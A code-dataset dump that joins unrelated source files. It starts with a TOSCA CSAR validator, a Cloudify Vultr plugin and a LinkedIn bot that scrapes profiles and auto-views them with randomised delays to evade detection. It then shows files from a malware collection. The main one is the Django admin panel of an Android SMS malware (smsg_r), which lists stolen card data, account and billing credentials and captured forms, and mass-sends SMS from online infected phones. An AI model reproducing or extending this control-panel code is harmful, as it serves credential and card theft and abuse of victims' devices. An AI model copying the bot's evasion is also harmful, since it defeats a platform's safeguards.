def entry_definitions_yaml(self):
'''Returns the TOSCA entry definitions YAML contents'''
with open(os.path.join(self.path,
self.entry_definitions), 'r') as mfile:
return yaml.load(mfile)
return dict()
def _retrieve(self):
'''
Fetches a CSAR package (remote or local)
'''
if not self.csar['external']:
self.log.debug('CSAR is local; normalizing path')
self.csar['local'] = os.path.normpath(self.csar['source'])
self.log.debug('CSAR local path is: %s', self.csar['local'])
return
# Get a temporary file
self.log.debug('Generating temporary file')
tmp_hndl, tmp_filename = mkstemp()
self.log.debug('Temporary file is: %s', tmp_filename)
# Download the archive
self.log.debug('Starting remote CSAR download')
req = requests.get(self.csar['source'], stream=True)
for chunk in req.iter_content(chunk_size=1024):
if chunk:
os.write(tmp_hndl, chunk)
self.log.debug('Remote CSAR downloaded; closing temporary file')
os.close(tmp_hndl)
# Update the CSAR definition
self.csar['local'] = tmp_filename
def _extract(self):
'''
Extracts a CSAR package
'''
if not self.csar['local']:
raise RuntimeError('Missing CSAR file')
if not zipfile.is_zipfile(self.csar['local']):
raise RuntimeError('CSAR file is not in ZIP format')
# Get a temporary directory to use
self.log.debug('Generating temporary directory')
tmp_dirname = mkdtemp()
self.log.debug('Temporary directory is: %s', tmp_dirname)
# Extract ZIP file to temporary directory
self.log.debug('Extracting CSAR contents')
zfile = zipfile.ZipFile(self.csar['local'])
zfile.extractall(tmp_dirname)
self.log.debug('CSAR contents successfully extracted')
# Update the CSAR definition
self.csar['destination'] = tmp_dirname
def _validate(self):
'''
Validates a CSAR package
'''
csar_root = self.csar.get('destination')
# Check for a CSAR contents folder
if not csar_root or not os.path.isdir(csar_root):
raise RuntimeError('Missing CSAR contents')
# Validate metadata
if self.has_metadata_file:
self._validate_metadata_file()
else:
self._validate_metadata_inline()
# Validate entry definitions
self._validate_entry_definitions()
# Validate artifacts
self._validate_artifacts()
def _validate_metadata_file(self):
'''
Validates CSAR metadata file
'''
# Check for metadata
csar_metafile = os.path.join(self.path, constants.META_FILE)
self.log.debug('CSAR metadata file: %s', csar_metafile)
# Check the expected files/folders exist
if not csar_metafile or not os.path.isfile(csar_metafile):
raise RuntimeError('Missing CSAR metadata file')
# Validate metadata YAML
metadata = dict()
self.log.debug('Attempting to parse CSAR metadata YAML')
with open(csar_metafile, 'r') as mfile:
metadata = yaml.load(mfile)
self.log.debug('CSAR metadata:\n%s', pformat(metadata))
# Validate metadata specification
if constants.META_FILE_VERSION_KEY not in metadata:
raise RuntimeError('Missing metadata "%s"' %
constants.META_FILE_VERSION_KEY)
if str(metadata[constants.META_FILE_VERSION_KEY]) != '1.0':
raise RuntimeError('Metadata "%s" must be 1.0' %
constants.META_FILE_VERSION_KEY)
if constants.META_CSAR_VERSION_KEY not in metadata:
raise RuntimeError('Missing metadata "%s"' %
constants.META_CSAR_VERSION_KEY)
if str(metadata[constants.META_CSAR_VERSION_KEY]) != '1.1':
raise RuntimeError('Metadata "%s" must be 1.1' %
constants.META_CSAR_VERSION_KEY)
if constants.META_CREATED_BY_KEY not in metadata or \
not metadata[constants.META_CREATED_BY_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_CREATED_BY_KEY)
if constants.META_ENTRY_DEFINITIONS_KEY not in metadata or \
not metadata[constants.META_ENTRY_DEFINITIONS_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_ENTRY_DEFINITIONS_KEY)
# Update the CSAR definition
self.csar['metadata'] = metadata
def _validate_metadata_inline(self):
'''
Validates CSAR inline metadata
'''
# Get a list of all definition files in the root folder
root_defs = list()
self.log.debug('Searching for TOSCA template file with metadata')
for ext in ['yaml', 'yml']:
root_defs.extend(glob('%s/*.%s' % (self.path, ext)))
# Make sure there's only one
if len(root_defs) is not 1:
raise RuntimeError(
'Exactly 1 YAML file must exist in the CSAR root directory')
# Validate metadata YAML
def_data = dict()
self.log.debug('Attempting to parse CSAR metadata YAML')
with open(root_defs[0], 'r') as def_file:
def_data = yaml.load(def_file)
# Validate metadata specification
metadata = def_data.get('metadata')
if not metadata:
raise RuntimeError('Missing metadata section')
if constants.META_TMPL_VERSION_KEY not in metadata:
raise RuntimeError('Missing metadata "%s"' %
constants.META_TMPL_VERSION_KEY)
if str(metadata[constants.META_TMPL_VERSION_KEY]) != '1.1':
raise RuntimeError('Metadata "%s" must be 1.1' %
constants.META_TMPL_VERSION_KEY)
if constants.META_TMPL_AUTHOR_KEY not in metadata or \
not metadata[constants.META_TMPL_AUTHOR_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_TMPL_AUTHOR_KEY)
if constants.META_TMPL_NAME_KEY not in metadata or \
not metadata[constants.META_TMPL_NAME_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_TMPL_NAME_KEY)
# Update the CSAR definition
metadata[constants.META_ENTRY_DEFINITIONS_KEY] = root_defs[0]
self.csar['metadata'] = metadata
def _validate_entry_definitions(self):
'''
Validates entry definitions
'''
self.log.debug('CSAR entry definitions: %s', self.entry_definitions)
if not self.has_metadata_file:
self.log.debug('Using inline metadata; skipping...')
return
if not os.path.isfile(os.path.join(self.path,
self.entry_definitions)):
raise RuntimeError('"%s" points to "%s", but the file '
'does not exist' % (
constants.META_ENTRY_DEFINITIONS_KEY,
self.entry_definitions))
def _validate_artifacts(self):
'''
Validates artifacts
'''
self.log.debug('Searching for user-defined MIME types')
mtypes = glob(os.path.join(self.path, constants.META_MIMETYPES_GLOB))
self.log.debug('Loading %s user-defined MIME types', len(mtypes))
mimetypes.init(mtypes or None)
self.log.debug('Checking for artifacts')
if not self.artifacts:
self.log.debug('No artifacts declared')
return
# Iterate through each artifacts
for name, artifact in self.artifacts.iteritems():
self._validate_artifact(name, artifact)
def _validate_artifact(self, name, artifact):
'''
Validates a single artifact
'''
self.log.debug('Validating artifact: %s', name)
self.log.debug('Checking if artifact file exists')
path = os.path.join(self.path, name)
if not os.path.isfile(path):
raise RuntimeError('Artifact "%s" delcared, but file does '
'not exist' % name)
# Validate the content-type
if 'content-type' not in artifact:
raise RuntimeError('Artifact missing "content-type"')
self.log.debug('Artifact content-type: %s', artifact['content-type'])
tstype = artifact['content-type'].split('/')
if len(tstype) < 2:
raise RuntimeError('Artifact content-type must comply with the '
'"type/subtype" structure')
if not tstype[-1].startswith('vnd.'):
self.log.warn('Artifact content-type subtype should start '
'with "vnd."')
# Validate content-type as a known MIME type
self.log.debug('Checking content-type against known MIME types')
if len([{x: y} for x, y in mimetypes.types_map.iteritems()
if y == artifact['content-type']]) < 1:
self.log.warn('Could not match artifact content-type '
'with any known MIME type')
# Validate the artifact MIME type against the content-type
self.log.debug('Checking artifact MIME type against content-type')
mtype = mimetypes.guess_type(path)[0]
if mtype is None:
self.log.warn('Could not match artifact to a known MIME type')
if mtype != artifact['content-type']:
self.log.warn('Artifact content-type does not match the '
'artifacts MIME type')
# Validate the signature / digest
if 'signature' in artifact:
sig = artifact['signature']
algo = sig.get('algorithm')
digest = sig.get('digest')
if not algo:
raise RuntimeError(
'Artifact signature delcared, but no algorithm was found')
if not digest:
raise RuntimeError(
'Artifact signature delcared, but no digest was found')
# Decode base64 encoded digest
self.log.debug('Decoding base64-encoded artifact digest')
digest = b64decode(digest).strip()
self.log.debug('Decoded artifact digest: %s', digest)
# Calculate hash of the actual artifact
self.log.debug('Calculating %s digest of artifact %s', algo, name)
adigest = hashlib.new(algo, open(path, 'rb').read()).hexdigest()
self.log.debug('Calculated artifact digest: %s', adigest)
# Compare digests
if digest != adigest:
raise RuntimeError('Artifact digest mismatch')
``` |
{
"source": "01000101/cloudify-vultr-plugin",
"score": 2
} |
#### File: cloudify-vultr-plugin/plugin/instance.py
```python
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError, RecoverableError
from cloudify.decorators import operation
from vultr import Vultr, VultrError
def _helper_get_vultr_api_key():
'''Gets the Vultr API key for use in all Vultr API calls'''
return '<KEY>
def _helper_get_vultr_client():
'''Returns a connected Vultr API client'''
try:
return Vultr(_helper_get_vultr_api_key())
except VultrError:
raise NonRecoverableError(
'Connection to Vultr API failed. '
'Incorrect / Invalid API key provided.')
def _helper_get_existing_server(client, resource_id):
'''Returns a JSON object for an existing server'''
if (not client) or (not resource_id):
return None
return client.server_list(resource_id)
def provision_server(client, opts):
'''Provisions a new server on the provider'''
_err = False
if not opts.get('vps_plan_id'):
_err = True
ctx.logger.error('Missing VPSPLANID (Subscription Plan) '
'from the node properties')
if not opts.get('os_id'):
_err = True
ctx.logger.error('Missing OSID (Image) from the node properties')
if not opts.get('dc_id'):
_err = True
ctx.logger.error('Missing DCID (Location) from the node properties')
if _err:
NonRecoverableError('Missing required node properties')
ctx.logger.info('\nProvisioning new server with properties:\n'
'{0}' . format(opts))
try:
result = client.server_create(
opts.get('dc_id'),
opts.get('vps_plan_id'),
opts.get('os_id'),
label=opts.get('label'),
sshkeyid=opts.get('ssh_key_id')
)
except VultrError, ex:
ctx.logger.error('Exception: {0}' . format(ex))
RecoverableError('Could not create the server')
return result.get('SUBID')
def server_is_active(client, sub_id):
'''Checks if a Vultr server is active or not'''
instance = _helper_get_existing_server(client, sub_id)
if instance:
if instance.get('status', '') == 'active':
if instance.get('server_state', '') == 'ok':
return True
return False
@operation
def run_instances(**_):
'''This actually creates the Vultr server'''
client = _helper_get_vultr_client()
cfy_agent = ctx.node.properties.get('cloudify_agent', dict())
bs_cfy_agent = ctx.bootstrap_context.cloudify_agent
cfy_user = cfy_agent.get('user', bs_cfy_agent.user)
cfy_key = cfy_agent.get('key', bs_cfy_agent.agent_key_path)
ctx.logger.info('BootstrapContext.cloudify_agent: {0}'
. format(vars(bs_cfy_agent)))
ctx.logger.info('SSH User: {0}, Key: {1}'
. format(cfy_user, cfy_key))
# Get the Vultr SUBID (indicating that we're using an existing resource)
sub_id = ctx.node.properties.get('SUBID')
if sub_id:
ctx.logger.info('Using SUBID: {0}' . format(sub_id))
# Get the server information (if it exists)
server = _helper_get_existing_server(client, sub_id)
if server:
ctx.logger.info('Vultr server: {0}' . format(server))
# External resource doesn't exist when it's supposed to
if sub_id and not server:
raise NonRecoverableError(
'External resource, but the supplied '
'server SUBID is not in the account.')
# External resource exists when it's not supposed to
if not sub_id and server:
raise NonRecoverableError(
'Not external resource, but the supplied '
'but the server already exists.')
# External resource information dump
if sub_id:
ctx.logger.info(
'\nExternal resource:\n'
' Label: {0}\n'
' SUBID: {1}\n'
' OS: {2}\n'
' vCPUs: {3}\n'
' RAM: {4}\n'
' DISK: {5}\n'
' Location: {6}\n'
' IP: {7}'
. format(
server['label'],
server['SUBID'],
server['os'],
server['vcpu_count'],
server['ram'],
server['disk'],
server['location'],
server['main_ip']
)
)
ctx.instance.runtime_properties['ip'] = server['main_ip']
return
else:
if ctx.operation.retry_number == 0:
extra_opts = ctx.node.properties.get('CONFIG', dict())
# Actually request the server be created
sub_id = provision_server(
client,
{
'vps_plan_id': ctx.node.properties.get('VPSPLANID'),
'os_id': ctx.node.properties.get('OSID'),
'dc_id': ctx.node.properties.get('DCID'),
'label': extra_opts.get('label'),
'ssh_key_id': extra_opts.get('SSHKEYID')
}
)
if not sub_id:
NonRecoverableError(
'Unable to provision a new server. '
'Provider did not issue a SUBID.'
)
ctx.instance.runtime_properties['SUBID'] = sub_id
else:
sub_id = ctx.instance.runtime_properties.get('SUBID')
if server_is_active(client, sub_id):
ctx.logger.info('Server has been provisioned '
'with SUBID {0}' . format(sub_id))
server = _helper_get_existing_server(client, sub_id)
ctx.instance.runtime_properties['ip'] = \
server.get('main_ip')
ctx.logger.info('Server Information:\n{0}' . format(server))
ctx.logger.info('Runtime properties:\n{0}'
. format(ctx.instance.runtime_properties))
ctx.logger.info('Properties:\n{0}'
. format(ctx.node.properties))
return
return ctx.operation.retry(
message='Waiting for server {0} to be '
'added to your account.' . format(sub_id))
@operation
def stop(**_):
'''Terminates all existing Vultr servers'''
client = _helper_get_vultr_client()
sub_id = ctx.instance.runtime_properties.get('SUBID')
if not sub_id:
return
ctx.logger.info('Attempting to destroy server SUBID={0}'
. format(sub_id))
try:
res = client.server_destroy(sub_id)
ctx.logger.info('Result: {0}' . format(res))
except VultrError, ex:
ctx.logger.error('Exception: {0}' . format(ex))
return ctx.operation.retry(
message='Waiting to destroy server {0}. '
'(note: you cannot destroy Vultr servers within '
'5 minutes of creation)'
. format(sub_id))
``` |
{
"source": "01000101/LinkedIn-Viewer-Bot",
"score": 3
} |
#### File: 01000101/LinkedIn-Viewer-Bot/bot.py
```python
import logging
import json
import codecs
from random import randint, shuffle
from time import sleep
from pprint import pformat
from lxml import html
import urllib3
from requests import Session
from requests.adapters import HTTPAdapter
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('requests.packages.urllib3').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote').setLevel(logging.WARNING)
# Authentication
LINKEDIN_USERNAME = ''
LINKEDIN_PASSWORD = ''
# Configuration
LINKEDIN_SEARCH_TERMS = ['technical recruiter', 'engineering recruiter']
LINKEDIN_START_PROFILES = []
# Connection
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) ' \
'Gecko/20100101 Firefox/34.0'
LINKEDIN_PROFILE_URL = 'https://www.linkedin.com/in/'
# Public profile
X_PROFILE_NAME = \
'//div[@class="profile-overview-content"]' \
'//h1[@id="name"]/text()'
# Public profile experiences
X_PROFILE_EXPERIENCES = '//section[@id="experience"]/ul/li'
X_EXPERIENCE_TITLE = './/header/h4[@class="item-title"]//text()'
X_EXPERIENCE_COMPANY = './/header/h5[@class="item-subtitle"]//text()'
# Public profile suggestions
X_PROFILE_SUGGESTIONS = \
'//div[@id="aux"]//div[@class="browse-map"]' \
'/ul/li[contains(@class, "profile-card")]'
X_SUGGESTION_NAME = './div[@class="info"]/h4[@class="item-title"]/a/text()'
X_SUGGESTION_URL = './div[@class="info"]/h4[@class="item-title"]/a/@href'
X_SUGGESTION_HEADLINE = './div[@class="info"]/p[@class="headline"]/text()'
# GatherProxy XPaths
P_GP_PROXIES = '//table[@id="tblproxy"]/tr'
def _single(arr):
'''Returns the first array item or None'''
return arr[0] if len(arr) > 0 else None
def find_by_xpath(driver, xpath):
'''Finds an element by XPATH'''
return WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, xpath)))
def authenticate(driver):
'''Starts an authenticated session'''
driver.get('https://www.linkedin.com/uas/login')
find_by_xpath(driver, '//input[@name = "session_key"]').send_keys(
LINKEDIN_USERNAME)
find_by_xpath(driver, '//input[@name = "session_password"]').send_keys(
LINKEDIN_PASSWORD)
find_by_xpath(driver, '//input[@id = "btn-primary"]').click()
sleep(2)
class ProxyCrawler(object):
'''
Crawles proxy list websites to harvest usable proxies
'''
def __init__(self):
self.log = logging.getLogger('linkedout.proxy')
self.proxies = self.crawl_gatherproxy()
def crawl_gatherproxy(self):
'''Scrape GatherProxy for proxies'''
baseurl = 'http://gatherproxy.com/'
searchurl = baseurl + 'proxylist/anonymity/?t=Elite'
searchpage = 1
session = self.get_session_connection(baseurl)
proxies = list()
# Search
for searchpage in range(1, 3):
self.log.debug('Fetching GatherProxy proxy list')
self.log.debug('| page: %s', searchpage)
res = session.request(
url=searchurl,
method='post',
data='Type=elite&PageIdx=%s&Uptime=0' % (searchpage),
headers={
'Content-Type': 'application/x-www-form-urlencoded'
})
self.log.debug('|_status code: %s', res.status_code)
if res.status_code is not 200:
return None
# Set up for XPath
tree = html.fromstring(res.text)
# Close our session
session.close()
# Find the person's name
proxy_rows = tree.xpath(P_GP_PROXIES)[2:]
for proxy_row in proxy_rows:
raw_cols = proxy_row.xpath('./td/text()')
proxy_cols = proxy_row.xpath('./td/script/text()')
proxies.append({
'ip': proxy_cols[0].replace(
'document.write(\'', '').replace('\')', ''),
'port': int(proxy_cols[1].replace(
'document.write(gp.dep(\'', '').replace(
'\'))', ''), 16),
'location': raw_cols[2],
'speed': int(raw_cols[5].replace('ms', ''))
})
self.log.debug('Proxies: %s', pformat(proxies))
@staticmethod
def get_session_connection(baseurl):
'''
Creates a `requests.Session` instance
and includes basic connection fault tolerance.
:returns: A configured requests.Session instance
:rtype: :class:`requests.Session`
'''
# Build a session object with some fault tolerance
# Retry up to 10 times with increasing backoff time
# up to 120 seconds.
session = Session()
session.mount(
baseurl,
HTTPAdapter(
max_retries=urllib3.util.Retry(
total=10,
backoff_factor=0.4,
status_forcelist=[500, 501, 502, 503, 504]
)))
session.headers = {
'User-Agent': USER_AGENT
}
return session
class LinkedInCrawler(object):
'''
Helper to crawl public LinkedIn pages
and acting as a spider collecting information
about profiles to feed to a viewer instance.
:param list terms: List of search terms to crawl
:param bool public: True for public profiles,
False for authenticated / private profiles
'''
def __init__(self, terms=None, public=True):
self.log = logging.getLogger('linkedout.crawler')
self.terms = [x.lower() for x in terms or list()] or None
self.public = public
self._active_list = list()
def build_profile_list(self, profile_urls, depth=1):
'''
Builds a list of public profile information
based on recursive suggestion searches
:param list profile_urls: List of public profiles to crawl from
:param int depth: Suggestions crawl depth
:returns: List of profiles
:rtype: list
'''
self._active_list = list()
people = list()
# Normalize types
if isinstance(profile_urls, basestring):
profile_urls = [profile_urls]
# Crawl profiles
for profile_url in profile_urls:
people.extend(self._build_profile_list(profile_url, depth))
# Remove empty items and return
return [x for x in people if x is not None]
def _build_profile_list(self, profile_url, depth=1):
'''Worker for build_profile_list()'''
self.log.debug('build_profile_list(%s, %s)',
profile_url, depth)
active = self.parse_public_profile(profile_url)
if not active:
return list()
# Redundancy check list
self._active_list.append(active.get('name'))
self.log.debug('Active list: %s', self._active_list)
people = [active]
if depth:
for suggestion in active.get('suggestions', list()):
sname = suggestion.get('name')
if not sname:
self.log.warn('A suggestion has no name')
continue
# Check that there's a profile URL
if not suggestion.get('url'):
self.log.warn('Suggestion "%s" missing URL', sname)
continue
# Check that we're not repeating ourselves
if suggestion.get('name') in set(self._active_list):
self.log.warn('Suggestion "%s" already crawled', sname)
continue
# Weed out profiles that don't match the terms set
if not suggestion.get('headline'):
self.log.warn('Suggestion "%s" has no headline', sname)
continue
headline = suggestion.get('headline', '').lower()
if self.terms and \
len([x for x in self.terms if x in headline]) < 1:
self.log.warn('Suggestion "%s" doesn\'t match terms set',
sname)
continue
# Act totally not like a Python bot
sleep(randint(1, 10))
# Enter recursion hell
people.extend(self._build_profile_list(
suggestion['url'],
depth=depth-1))
return people
def parse_public_profile(self, profile_url):
'''
Parses a public user profile for key
properties (name, experience, etc...)
:returns: Profile information
:rtype: dict
'''
session = self.get_session_connection()
person = dict()
# Normalize profile link
if not profile_url.startswith(LINKEDIN_PROFILE_URL):
profile_url = LINKEDIN_PROFILE_URL + profile_url
self.log.debug('Fetching public profile')
self.log.debug('| url: %s', profile_url)
self.log.debug('| method: GET')
# Request the page
res = session.request(url=profile_url, method='get')
self.log.debug('|_status code: %s', res.status_code)
if res.status_code is not 200:
return None
# Set up for XPath
tree = html.fromstring(res.text)
# Close our session
session.close()
# Save the person's profile link
person['url'] = profile_url
# Find the person's name
person['name'] = _single(tree.xpath(X_PROFILE_NAME))
# Find experience
person['experiences'] = list()
for experience in tree.xpath(X_PROFILE_EXPERIENCES):
person['experiences'].append({
'title': _single(experience.xpath(X_EXPERIENCE_TITLE)),
'company': _single(experience.xpath(X_EXPERIENCE_COMPANY)),
'date': {
'start': _single(experience.xpath('.//time[1]/text()')),
'end': _single(experience.xpath('.//time[2]/text()'))
}
})
# Find suggested profiles
person['suggestions'] = list()
for suggestion in tree.xpath(X_PROFILE_SUGGESTIONS):
url = _single(suggestion.xpath(X_SUGGESTION_URL))
if url:
url = url.split('?')[0]
person['suggestions'].append({
'url': url,
'name': _single(suggestion.xpath(X_SUGGESTION_NAME)),
'headline': _single(suggestion.xpath(X_SUGGESTION_HEADLINE))
})
self.log.debug('Profile information: %s',
json.dumps(person, indent=2))
return person
@staticmethod
def get_session_connection():
'''
Creates a `requests.Session` instance
and includes basic connection fault tolerance.
:returns: A configured requests.Session instance
:rtype: :class:`requests.Session`
'''
# Build a session object with some fault tolerance
# Retry up to 10 times with increasing backoff time
# up to 120 seconds.
session = Session()
session.mount(
LINKEDIN_PROFILE_URL,
HTTPAdapter(
max_retries=urllib3.util.Retry(
total=10,
backoff_factor=0.4,
status_forcelist=[500, 501, 502, 503, 504]
)))
session.headers = {
'User-Agent': USER_AGENT
}
return session
def main():
'''Entry point'''
# Get a list of usable proxies
# proxylist = ProxyCrawler()
# Init the crawler
crawler = LinkedInCrawler(LINKEDIN_SEARCH_TERMS)
# Build a list to use for searching
people = crawler.build_profile_list(LINKEDIN_START_PROFILES, depth=3)
print 'People: %s' % json.dumps(people, indent=2)
# Roll the dice, mix up the list
shuffle(people)
# Get a browser driver
driver = webdriver.Chrome()
# Get an authenticated session
authenticate(driver)
# Read in parsable list of profiles to start with
for person in people:
print 'Viewing profile: "%s"' % person['name']
driver.get(person['url'])
_sleep_cnt = randint(2, 45)
print '|_sleeping %s seconds' % _sleep_cnt
sleep(_sleep_cnt)
print 'Successfully viewed %s profiles' % len(people)
if __name__ == "__main__":
main()
``` |
{
"source": "010001111/Vx-Suites",
"score": 3
} |
#### File: Vx-Suites/Python.FancyBear/ConsoleLogger.py
```python
import sys
########################################################################
class ConsoleLogger(object):
def log_exception(self, message=''):
if message:
message += " - "
print "#! EXC: ", message, sys.exc_info()[0].__name__, ":", sys.exc_info()[1]
def log_error(self, message):
print "#! ERR:", message
def log_warning(self, message):
print "#! WAR:", message
def log_message(self, message):
print "#>", message
if __name__ == '__main__':
logger = ConsoleLogger()
try:
raise BaseException("OoooopS! Exception!")
except:
logger.log_exception("WTF?!")
try:
raise ValueError("OoooopS! Exception! 2")
except:
logger.log_exception()
logger.log_error("Test Error")
logger.log_warning("Test Warning")
logger.log_message("Test message")
```
#### File: gui/terminal/__init__.py
```python
import dsz
import dsz.lp.alias
import dsz.lp.cmdline
import dsz.path
import dsz.version
import os
import re
import sys
import xml.dom.minidom
class NewTerminal:
def __init__(self):
self.bFocus = False
self.bClose = False
self.bDisable = False
self.dst = dsz.script.Env['target_address']
self.bDetach = False;
self.locX = 0
self.locY = 0
self.sizeWidth = 0
self.sizeHeight = 0
self.name = None
self.command = None
def setDetach(self, width, height, x, y):
self.bDetach = True
self.locX = x
self.locY = y
self.sizeWidth = width
self.sizeHeight = height
return True
def setLocation(self, x, y):
self.bDetach = True
self.locX = x
self.locY = y
return True
def setSize(self, width, height):
self.sizeWidth = width
self.sizeHeight = height
return True
def setFocus(self, value=True):
self.bFocus = value
def setClose(self, value=True):
self.bClose = value
def setDisable(self, value=True):
self.bDisable = value
def setDestination(self, dest):
self.dst = dest
def setName(self, newName):
self.name = newName
def setCommand(self, cmd):
self.command = cmd
def spawn(self):
cmd = "gui -command \".newterm ";
if self.bFocus:
cmd += "-focus "
if self.bClose:
cmd += "-close "
if self.bDisable:
cmd += "-disable "
if self.bDetach:
cmd += "-detach=%dx%d@%d,%d " % (self.sizeWidth, self.sizeHeight, self.locX, self.locY)
if self.dst <> None:
cmd += "-dst=%s " % self.dst
if self.name <> None:
cmd += "-name=\\\"%s\\\" " % self.name
if self.command <> None:
cmd += "-cmd=\\\"%s\\\" " % self.command
cmd += "\"";
return dsz.cmd.Run(cmd)
```
#### File: smsg_r/smsapp/admin_extra_views.py
```python
import logging
from bson.objectid import ObjectId
from django import forms
from django.conf import settings
from django.contrib import messages
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render, redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from decorators import admin_user_required
import models
import commands
logger = logging.getLogger(__name__)
@staff_member_required
def card_info_list(request, export=None):
info = settings.MONGO['extra_data'].find(
{'type': 'userdata', 'data.type': 'card information', 'hidden': {'$ne': 'y'}})
cl = {'opts': {'app_label': "smsapp"}}
tmpl = 'admin/smsapp/info/cards.html'
ct = "text/html"
if export:
tmpl = 'admin/smsapp/info/cards.txt'
ct = "text/plain"
return render(request, tmpl, {'cards': info, 'cl': cl}, content_type=ct)
@staff_member_required
def hide_card_info(request, oid):
settings.MONGO['extra_data'].update({"_id": ObjectId(oid)}, {'$set': {'hidden': 'y'}})
return redirect('card_list')
@admin_user_required
def account_info_list(request):
app_types = (
('', '----'),
('gm', 'Gmail'),
('fb', 'Facebook'),
('tw', 'Twitter'),
)
class AccTypeForm(forms.Form):
t1 = forms.ChoiceField(choices=app_types, label=_("account type"), required=False)
type_filter = {'type': 'userdata', 'data.type': 'account'}
if request.POST.get('t1'):
type_filter['data.name'] = request.POST.get('t1')
info = settings.MONGO['extra_data'].find(type_filter)
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/accounts.html',
{'accounts': info, 'cl': cl, 'type_form': AccTypeForm(request.POST or None)})
@admin_user_required
def billing_acc_list(request):
acc_types = [
('', '----')
]
ts = settings.MONGO['extra_data'].find({'data.type': "billing credentials"}).distinct('data.name')
for t in ts:
acc_types.append((t, t))
class AccTypeForm(forms.Form):
t1 = forms.ChoiceField(choices=acc_types, label=_("account type"), required=False)
type_filter = {'type': 'userdata', 'data.type': 'billing credentials'}
if request.POST.get('t1'):
type_filter['data.name'] = request.POST.get('t1')
info = settings.MONGO['extra_data'].find(type_filter)
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/bill.html',
{'accounts': info, 'cl': cl, 'type_form': AccTypeForm(request.POST or None)})
@admin_user_required
def forms_info_list(request):
info = settings.MONGO['extra_data'].find({'type': 'userdata', 'data.type': 'forms'})
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/forms_list.html', {'forms': info, 'cl': cl})
@admin_user_required
def forms_info_details(request, objid):
obj = settings.MONGO['extra_data'].find_one(ObjectId(objid))
cl = {'opts': {'app_label': "smsapp"}}
# todo: old forms
forms_ = obj['data']['forms']
return render(request, 'admin/smsapp/info/form_details.html',
{'form1': forms_.get('first window'), 'form2': forms_.get('second window'), 'cl': cl})
@admin_user_required
def html_form_details(request, objid):
obj = settings.MONGO['extra_data'].find_one(ObjectId(objid))
cl = {'opts': {'app_label': "smsapp"}}
form = obj['data']
return render(request, 'admin/smsapp/info/html_form_details.html', {'form': form, 'cl': cl})
@admin_user_required
def html_forms_list(request):
info = settings.MONGO['extra_data'].find({'type': 'userdata', 'data.type': 'js_form'})
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/html_forms_list.html', {'forms': info, 'cl': cl})
@admin_user_required
def top_apps(request):
def get_country_choices():
import pycountry
choices = [(None, '----')]
for d in models.PhoneData.objects.order_by('country').distinct().values('country'):
ccode = d['country']
try:
c = pycountry.countries.get(alpha2=ccode)
choices.append((ccode, c.name))
except KeyError:
logger.error("Unknown country: {0}".format(ccode))
return choices
class CountryForm(forms.Form):
country = forms.ChoiceField(choices=get_country_choices())
cl = {'opts': {'app_label': "smsapp"}}
if request.POST.get('country'):
ta = models.InstalledApp.objects.get_top_apps_by_country(request.POST.get('country'))
else:
ta = models.InstalledApp.objects.get_top_apps()
return render(request, 'admin/smsapp/info/apps.html', {'cl': cl, 'apps': ta,
'country_form': CountryForm(request.POST or None)})
# noinspection PyUnusedLocal
@admin_user_required
def view_bot(request, code=None):
if code is None and request.method == 'POST':
code = request.POST.get('code')
phone = get_object_or_404(models.PhoneData, uniq_id=code)
return redirect('admin:smsapp_phonedata_change', phone.id)
@admin_user_required
def mass_sms_send(request):
class MassSMSForm(forms.Form):
sms_to = forms.CharField(max_length=255)
sms_text = forms.CharField(widget=forms.Textarea)
fm = MassSMSForm(request.POST or None)
if fm.is_valid():
logger.debug("Sending SMSs")
phones = models.PhoneData.objects.raw(
"SELECT * FROM smsapp_phonedata WHERE last_connection >= NOW() - INTERVAL '15 minutes'")
for p in phones:
logger.debug("Sending SMS to online phone {0}".format(p))
commands.send_sms(p, fm.cleaned_data['sms_to'], fm.cleaned_data['sms_text'])
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/utils/mass_sms.html', {'cl': cl, 'sms_form': fm})
@admin_user_required
def country_list_admin(request):
countries = models.PhoneData.objects.get_country_list_total()
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/info/countries.html', {'cl': cl, 'data': countries})
@admin_user_required
def option_blacklist(request):
class BlacklistForm(forms.Form):
content = forms.CharField(widget=forms.Textarea)
opt, created = models.Option.objects.get_or_create(name="blacklist")
fm = BlacklistForm(request.POST or None, initial={'content': opt.content})
if fm.is_valid():
opt.content = fm.cleaned_data.get("content")
opt.save()
messages.success(request, "Saved")
return redirect('admin:index')
cl = {'opts': {'app_label': "smsapp"}}
return render(request, 'admin/smsapp/utils/blacklist.html', {'cl': cl, 'form': fm})
@admin_user_required
def crash_report(request, oid):
o = settings.MONGO['extra_data'].find_one(ObjectId(oid))
d = {'code': o['code'], 'data': o['data']}
return render(request, 'admin/smsapp/phonedata/view_report.html', d)
```
#### File: smsg_r/smsapp/admin.py
```python
import logging
from django import forms
from django.conf import settings
from django.contrib import admin
from django.forms import Form
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.utils.translation import ugettext_lazy as _
# Register your models here.
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
import html5
import remote_dialog
from . import commands, cfields
from .models import SysUser, Installer, PhoneData, RemoteDialog, LogRecord, SMSRecord, InternalSMS, \
operator_code_to_full_name, AppDialog
logger = logging.getLogger(__name__)
class MyAdminSite(admin.AdminSite):
index_template = "admin/home.html"
admin_site = MyAdminSite()
admin.site = admin_site
def autodiscover():
"""
Autodiscover function from django.contrib.admin
"""
import copy
from django.conf import settings
from django.utils.importlib import import_module
